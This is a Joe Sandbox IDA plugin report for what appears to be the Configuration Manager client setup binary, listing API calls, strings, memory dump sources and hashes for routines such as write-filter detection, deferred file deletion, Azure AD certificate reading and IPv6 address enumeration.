                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B5431
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B54F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B559D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B5724
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005B543D
                                                                                          • util.cpp, xrefs: 005B5730
                                                                                          • UWF_Filter.Id="UWF_Filter", xrefs: 005B54B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B571F
                                                                                          • "m, xrefs: 005B57F4
                                                                                          • UWF is not enabled in this session., xrefs: 005B5618
                                                                                          • spNamespace.Open( szEmbeddedNamespace), xrefs: 005B5427
                                                                                          • spNamespace.Query( sQuery.c_str(), &spEnum), xrefs: 005B571A
                                                                                          • util.cpp, xrefs: 005B5714
                                                                                          • SELECT * FROM UWF_VOLUME WHERE Protected = TRUE AND CurrentSession = TRUE AND DriveLetter = "%s", xrefs: 005B56BD
                                                                                          • util.cpp, xrefs: 005B54E5
                                                                                          • UWF: Failed to read %s property from UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESU, xrefs: 005B55DB
                                                                                          • spFilterInstance.GetBoolean( szCurrentEnabledProperty, bCurrentEnabled), xrefs: 005B5593
                                                                                          • spNamespace.Get( szFilterInstance, &spFilterInstance), xrefs: 005B54EB
                                                                                          • util.cpp, xrefs: 005B558D
                                                                                          • util.cpp, xrefs: 005B5421
                                                                                          • UWF: Checking if volume '%s' is protected, xrefs: 005B569D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B542C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B54F0
                                                                                          • UWF: Query for protected volume failed. HRESULT=0x%0x. Query string: %s, xrefs: 005B5769
                                                                                          • util.cpp, xrefs: 005B5501
                                                                                          • CurrentEnabled, xrefs: 005B555D, 005B55D6
                                                                                          • m, xrefs: 005B5753
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B5598
                                                                                          • UWF: Unable to open WMI namespace, "%s". HRESULT = 0x%0x, xrefs: 005B5475
                                                                                          • UWF: Failed to get UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESULT=0x%0x, xrefs: 005B553D
                                                                                          • 4 m, xrefs: 005B57A9
                                                                                          • util.cpp, xrefs: 005B55A9
                                                                                          • DetectUWF, xrefs: 005B53C6
                                                                                          • UWF: Write filter is enabled on volume %s., xrefs: 005B57BE
                                                                                          • UWF: Filter is enabled, but volume '%s' is not protected, xrefs: 005B5803
                                                                                          • root\standardcimv2\embedded, xrefs: 005B53ED, 005B5470
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057E0E2
                                                                                          • DeleteFileW.KERNEL32(?,CcmSetup::DeleteFileW), ref: 0057E12F
                                                                                          • GetLastError.KERNEL32 ref: 0057E191
                                                                                          • GetLastError.KERNEL32 ref: 0057E1CA
                                                                                          • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,?,?,0000025C), ref: 0057E208
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E212
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E24F
                                                                                          • MoveFileExW.KERNEL32(?,?,00000009,?,?,?,?,?,0000025C), ref: 0057E275
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E283
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E2BB
                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,0000025C), ref: 0057E321
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E32F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E368
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Successfully renamed %s to %s and queued for deletion on reboot., xrefs: 0057E3EC
                                                                                          • CcmSetup::DeleteFileW, xrefs: 0057E113
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E2B6
                                                                                          • G), xrefs: 0057E3DA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E363
                                                                                          • &), xrefs: 0057E154
                                                                                          • 2), xrefs: 0057E1C0
                                                                                          • Failed to queue %s for deletion on reboot (0x%x), xrefs: 0057E3A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E24A
                                                                                          • Failed to delete %s (%lu). Renaming and queuing for deletion on reboot., xrefs: 0057E1D2
                                                                                          • MoveFileEx( pszFileName, szTempPath, MOVEFILE_REPLACE_EXISTING|MOVEFILE_WRITE_THROUGH ), xrefs: 0057E2B1
                                                                                          • ccmsetup.cpp, xrefs: 0057E23F
                                                                                          • ccmsetup.cpp, xrefs: 0057E370
                                                                                          • k, xrefs: 0057E1B6
                                                                                          • ccmsetup.cpp, xrefs: 0057E358
                                                                                          • ccmsetup.cpp, xrefs: 0057E257
                                                                                          • Failed to move %s to %s (0x%x), xrefs: 0057E2FD
                                                                                          • Deleted file %s, xrefs: 0057E15F
                                                                                          • ccmsetup.cpp, xrefs: 0057E2C7
                                                                                          • MoveFileEx( szTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT ), xrefs: 0057E35E
                                                                                          • ccmsetup.cpp, xrefs: 0057E2AB
                                                                                          • DEL, xrefs: 0057E202
                                                                                          • =), xrefs: 0057E2EA
                                                                                          • GetTempFileNameW(m_sDownloadDir, L"DEL", 0, szTempPath) > 0, xrefs: 0057E245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CurrentFileThread$Move$DeleteH_prolog3_catch_NameTemp
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$&)$2)$=)$CcmSetup::DeleteFileW$DEL$Deleted file %s$Failed to delete %s (%lu). Renaming and queuing for deletion on reboot.$Failed to move %s to %s (0x%x)$Failed to queue %s for deletion on reboot (0x%x)$G)$GetTempFileNameW(m_sDownloadDir, L"DEL", 0, szTempPath) > 0$MoveFileEx( pszFileName, szTempPath, MOVEFILE_REPLACE_EXISTING|MOVEFILE_WRITE_THROUGH )$MoveFileEx( szTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT )$Successfully renamed %s to %s and queued for deletion on reboot.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$k
                                                                                          • API String ID: 3643783826-1241515096
                                                                                          • Opcode ID: a14c40fb8cee26f140ad5a9393ce9685e6a5eb06c299cbd1439eded2a4384506
                                                                                          • Instruction ID: 3b5d7c070a6d0b947b1411783dafa18d563e58f315b887b7734977a3c67b3a63
                                                                                          • Opcode Fuzzy Hash: a14c40fb8cee26f140ad5a9393ce9685e6a5eb06c299cbd1439eded2a4384506
                                                                                          • Instruction Fuzzy Hash: 3771A4B1940328BAEB30EFA49C4EBEA7EB9BB59B40F5040D5F508A7181D7754A84CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062B13C
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005A13E3: __EH_prolog3.LIBCMT ref: 005A13EA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B2E8
                                                                                            • Part of subcall function 0060A160: __EH_prolog3.LIBCMT ref: 0060A167
                                                                                            • Part of subcall function 00609891: __EH_prolog3.LIBCMT ref: 00609898
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B36C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B49C
                                                                                            • Part of subcall function 00609E7C: __EH_prolog3.LIBCMT ref: 00609E83
                                                                                            • Part of subcall function 00609E7C: SysFreeString.OLEAUT32(?), ref: 00609EE2
                                                                                            • Part of subcall function 00609E7C: SysFreeString.OLEAUT32(00000000), ref: 00609F3F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062B68B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentThread$FreeString$CloseH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(elemRoot = doc.GetRootElement())$+$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$/$C$CcmGetAADIdentity(L"", stAadIds)$CcmUtilLib::CcmSetAADOnboardingInfo$CcmUtilLib::UpdateAADOnboardingInfo(sClientAppId, sResourceUri, L"")$ClientId$Failed to persist AAD on-boarding info. Error 0x%x$No AAD tenants information found.$Persisted AAD on-boarding info.$ResourceUri$Skipping tenant '%s' as it's not matching the joined tenant '%s'$Tenant$Tenants$V$doc.LoadFromString(sOnboardingXml)$|Y}$:}
                                                                                          • API String ID: 2728243797-4119497972
                                                                                          • Opcode ID: 9c5a62c50aa08ae5428200680923960030f63156e2fb78b33226c1221304bb94
                                                                                          • Instruction ID: 00ba0a0dab9b3d856909345a760770ad9af44e4418cd29de01242b1f578e211a
                                                                                          • Opcode Fuzzy Hash: 9c5a62c50aa08ae5428200680923960030f63156e2fb78b33226c1221304bb94
                                                                                          • Instruction Fuzzy Hash: C2029D70C4425DEADB24DBA4CD4ABEDBBB5AF15304F1440E9E14877282DBB41B88DF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061C07F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C0DA
                                                                                            • Part of subcall function 0061CB62: __EH_prolog3_catch.LIBCMT ref: 0061CB69
                                                                                            • Part of subcall function 0061CB62: GetCurrentThreadId.KERNEL32 ref: 0061CBC6
                                                                                            • Part of subcall function 0061CB62: LocalFree.KERNEL32(00000000,CcmUtilLib::GetStringFromCertExtension,00000034,0061C1EE,00000000,1.2.840.113556.1.5.284.5,00000000,00000001,00000002,00000000,00000000,000000FF,00000000,000000FF,00000000,000000FF), ref: 0061CDC3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C16F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C1CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C218
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C281
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C2D0
                                                                                          • CertFreeCertificateContext.CRYPT32(00000000,00000000,1.2.840.113556.1.5.284.3,?,00000000,1.2.840.113556.1.5.284.2,00000002,00000000,1.2.840.113556.1.5.284.5,00000000,00000001,00000002,00000000,00000000,000000FF,00000000), ref: 0061C304
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C213
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C28D
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C1D6
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C271
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C2DC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C27C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C16A
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_TenantId, stAadIds.sAADTenantID), xrefs: 0061C20E
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C224
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_AccountId, stAadIds.sAADUserID), xrefs: 0061C2C6
                                                                                          • 1.2.840.113556.1.5.284.3, xrefs: 0061C297
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C2C0
                                                                                          • GetStringFromCertExtension(pCertContext, c_szOID_ClientId, stAadIds.sAADDeviceID), xrefs: 0061C277
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C208
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C1BE
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C0E2
                                                                                          • 1.2.840.113556.1.5.284.2, xrefs: 0061C24C
                                                                                          • GetWPJCert(bUserStore, sUserSID, pCertContext), xrefs: 0061C165
                                                                                          • pCertContext != 0, xrefs: 0061C1C4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C1C9
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C177
                                                                                          • 1.2.840.113556.1.5.284.5, xrefs: 0061C1E3
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C0CA
                                                                                          • CcmUtilLib::GetAADIdsFromWPJCert, xrefs: 0061C08C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C0D5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061C2CB
                                                                                          • !sUserSID.empty(), xrefs: 0061C0D0
                                                                                          • ..\CcmUtilLib.cpp, xrefs: 0061C15F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeH_prolog3_catch$CertCertificateContextLocal
                                                                                          • String ID: !sUserSID.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$1.2.840.113556.1.5.284.2$1.2.840.113556.1.5.284.3$1.2.840.113556.1.5.284.5$CcmUtilLib::GetAADIdsFromWPJCert$GetStringFromCertExtension(pCertContext, c_szOID_AccountId, stAadIds.sAADUserID)$GetStringFromCertExtension(pCertContext, c_szOID_ClientId, stAadIds.sAADDeviceID)$GetStringFromCertExtension(pCertContext, c_szOID_TenantId, stAadIds.sAADTenantID)$GetWPJCert(bUserStore, sUserSID, pCertContext)$pCertContext != 0
                                                                                          • API String ID: 1816063395-1609411267
                                                                                          • Opcode ID: 088162497ad9c83d6d5586858eb8450c1a31ee2656eefb3bb59e2c1649bf3ff1
                                                                                          • Instruction ID: a7296e9d1a18f5252f69e9936ba453395e1d6f933dcc552e9ea98bd55a17c881
                                                                                          • Opcode Fuzzy Hash: 088162497ad9c83d6d5586858eb8450c1a31ee2656eefb3bb59e2c1649bf3ff1
                                                                                          • Instruction Fuzzy Hash: DD51B3B1AC4356BBDB11ABA08C0AFFE7E26AF45F70F184214F910673C2C7795A418791
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00677436
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 006770AF: __EH_prolog3_GS.LIBCMT ref: 006770B6
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000017,00000000,00000000,?,?), ref: 006774F1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00677540
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006775D1
                                                                                          • GetAdaptersAddresses.IPHLPAPI(00000017,00000000,00000000,?,?), ref: 006775FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00677637
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006777FE
                                                                                            • Part of subcall function 005F2FBF: vswprintf.LIBCMT ref: 005F2FF1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006778A9
                                                                                          Strings
                                                                                          • GetAdaptersAddresses(AF_INET6, 0, NULL, pAddresses, &outBufLen), xrefs: 0067762D
                                                                                          • StringCchPrintfW(szIPv6Address, (sizeof(szIPv6Address)/sizeof(szIPv6Address[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%, xrefs: 006777F4
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067763F
                                                                                          • IF type '%u' is filtered., xrefs: 006776F9
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677806
                                                                                          • CcmUtilLib::_GetIPV6AddressInformation, xrefs: 006774B9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00677632
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677899
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006775D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006778A4
                                                                                          • %02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X, xrefs: 006777B4
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677548
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006775C1
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006777EE
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677627
                                                                                          • IPV6: %s, xrefs: 00677947
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006777F9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006775CC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067753B
                                                                                          • %02X%02X:%02X%02X:%02X%02X:%02X%02X, xrefs: 0067785F
                                                                                          • dwRetVal, xrefs: 006775C7
                                                                                          • (pAddresses) != 0, xrefs: 00677536
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00677530
                                                                                          • StringCchPrintfW(szIPv6Prefix, (sizeof(szIPv6Prefix)/sizeof(szIPv6Prefix[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X", p6Addr->sin, xrefs: 0067789F
                                                                                          • Failed to retrieve IPV6 address information., xrefs: 00677667
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006778B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AdaptersAddresses$H_prolog3H_prolog3_H_prolog3_catch_vswprintf
                                                                                          • String ID: %02X%02X:%02X%02X:%02X%02X:%02X%02X$%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pAddresses) != 0$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$CcmUtilLib::_GetIPV6AddressInformation$Failed to retrieve IPV6 address information.$GetAdaptersAddresses(AF_INET6, 0, NULL, pAddresses, &outBufLen)$IF type '%u' is filtered.$IPV6: %s$StringCchPrintfW(szIPv6Address, (sizeof(szIPv6Address)/sizeof(szIPv6Address[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X:%02X%02X:%$StringCchPrintfW(szIPv6Prefix, (sizeof(szIPv6Prefix)/sizeof(szIPv6Prefix[0])), L"%02X%02X:%02X%02X:%02X%02X:%02X%02X", p6Addr->sin$dwRetVal
                                                                                          • API String ID: 216554775-3308246989
                                                                                          • Opcode ID: c1b674a846f6ed71ced83e53f4036d3eb97dc6663aef9987637a850a8fffdb30
                                                                                          • Instruction ID: 07927c226834b6dccb19b43019c8859eb5272362de0df002215c14929e71f4b1
                                                                                          • Opcode Fuzzy Hash: c1b674a846f6ed71ced83e53f4036d3eb97dc6663aef9987637a850a8fffdb30
                                                                                          • Instruction Fuzzy Hash: 4FE1C6B1805299AADB60DB658C45FEABBB9BF45300F0481D5F25CE7282D7789F80CF64
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B2132
                                                                                          • CoCreateInstance.OLE32(00703364,00000000,00000017,006C29AC,?,CancelBitsJobs,0000003C,005828AF,?,CcmSetup::DownloadClientFilesByBits,00000240,00582282,?,?,?,?), ref: 005B21D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2201
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B226D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B22B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B231D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B2370
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B23D4
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CreateH_prolog3_catchInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$0&l$CancelBitsJobs$spCopyJob->Cancel()$spCopyJob->GetDisplayName( &sTempName )$spEnumJobs->GetCount( &uCount )$spEnumJobs->Next( 1, &spCopyJob, 0 )$spManager->EnumJobs( 0x0001, &spEnumJobs )$spManager.createInstance(CLSID_BackgroundCopyManager)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1333685707-101662333
                                                                                          • Opcode ID: 233352b2797831309e5c9d71f7a6944c1034f79bd1473a213a1bd823b8e36dca
                                                                                          • Instruction ID: ce148d3c558a62194820e3a8a2daf2c391355b4b69fd56eb58bdcc7c68b5f000
                                                                                          • Opcode Fuzzy Hash: 233352b2797831309e5c9d71f7a6944c1034f79bd1473a213a1bd823b8e36dca
                                                                                          • Instruction Fuzzy Hash: F9918970D81259EBDB10DBA5C949FEEBFB5AF55B00F15404AF801B7381CB746A06CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00644047
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644152
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006441D2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644224
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00644273
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006442C4
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_
